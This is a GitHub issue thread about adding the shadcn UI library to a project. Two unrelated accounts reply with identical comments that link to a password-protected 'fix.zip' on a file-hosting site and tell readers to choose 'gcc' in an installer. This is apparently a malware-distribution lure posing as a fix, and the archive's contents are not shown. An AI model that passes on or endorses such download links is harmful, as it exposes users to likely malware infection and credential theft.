### ISSUE TITLE
add shadcn in the application for the UI ->  https://ui.shadcn.com/

### ISSUE THREAD

**Issue by BirushaNdegeya** [sofia-goma/libraryware#20]

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
